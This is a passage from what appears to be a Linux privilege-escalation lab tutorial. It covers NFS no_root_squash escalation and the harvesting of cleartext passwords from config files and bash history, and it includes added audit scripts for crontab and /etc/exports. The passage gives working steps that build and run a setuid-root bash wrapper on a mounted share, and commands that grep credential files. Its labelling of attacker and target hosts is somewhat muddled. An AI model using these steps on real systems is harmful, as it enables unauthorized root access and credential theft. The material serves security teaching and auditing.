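  chmod 777 "$d/bin/overwrite.sh" "$d/bin/compress.sh"   # the lab's weak modes
  cat > "$d/crontab" <<EOF
SHELL=/bin/sh
PATH=$d/home:$d/nonexist:$d/bin
# m h dom mon dow user command
* * * * * root overwrite.sh
* * * * * root $d/bin/compress.sh
EOF
  audit_crontab "$d/crontab" | sed "s|$d/||g"
  rm -rf "$d"
}

demo_crontab
```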

7. Escalation Path: NFS Root Squashing

  • Root squash means the NFS server maps a remote root user to an unprivileged user (nobody), restricting what root on the client can do on the share.
  • no_root_squash means the remote root keeps full root privileges on the exported directory.
  • cat /etc/exports
  • We can see a tmp folder exported with “no_root_squash”, i.e. this folder is shareable and mountable, and files we create on it as root keep root ownership.

In a new tab >>

  • showmount -e <attackersIp> (shows the exported directories; in this example we have /tmp *)
  • mkdir /tmp/mountme
  • mount -o rw,vers=2 <attackersIp>:/tmp /tmp/mountme
    We mount the remote /tmp export onto our own directory with read-write access.
  • echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/mountme/x.c
  • gcc /tmp/mountme/x.c -o /tmp/mountme/x
  • chmod +s /tmp/mountme/x

In the attacker’s machine >>

  • cd /tmp
  • ./x
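The cat /etc/exports step above is the check that matters, so the following added example (not from the original post) parses an exports file per client and reports every export/client pair that grants no_root_squash, where a remote root keeps UID 0 on the share. The exports text is constructed; its first line mirrors the lab.

```shell
# audit_exports FILE: print "NO_ROOT_SQUASH PATH CLIENT (OPTIONS)" for every
# export/client pair that grants no_root_squash (added example).
audit_exports() {
  awk '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
    {
      path = $1
      # each remaining field is client(options); a bare client has default options
      for (i = 2; i <= NF; i++) {
        client = $i; opts = ""
        if (match(client, /\(.*\)$/)) {
          opts = substr(client, RSTART + 1, RLENGTH - 2)
          client = substr(client, 1, RSTART - 1)
        }
        if (client == "") client = "*"
        if (opts ~ /(^|,)no_root_squash(,|$)/)
          print "NO_ROOT_SQUASH " path " " client " (" opts ")"
      }
    }' "$1"
  return 0
}

# demo_exports: constructed /etc/exports text; the /tmp line mirrors the lab.
demo_exports() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# /etc/exports: constructed sample
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/share 10.0.0.0/24(rw,sync,root_squash) 10.0.1.5(rw,no_root_squash)
/export/home *(ro,sync)
EOF
  audit_exports "$f"
  rm -f "$f"
}

demo_exports
```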

8. Others

8.1 Stored Passwords (Config Files)

Exploitation

Linux VM

1. In command prompt type: cat /home/user/myvpn.ovpn

2. From the output, make note of the value of the “auth-user-pass” directive.

3. In command prompt type: cat /etc/openvpn/auth.txt

4. From the output, make note of the clear-text credentials.

5. In command prompt type: cat /home/user/.irssi/config | grep -i passw

6. From the output, make note of the clear-text credentials.

8.2 Stored Passwords (History)

Exploitation

Linux VM

1. In command prompt type: cat ~/.bash_history | grep -i passw

2. From the output, make note of the clear-text credentials.
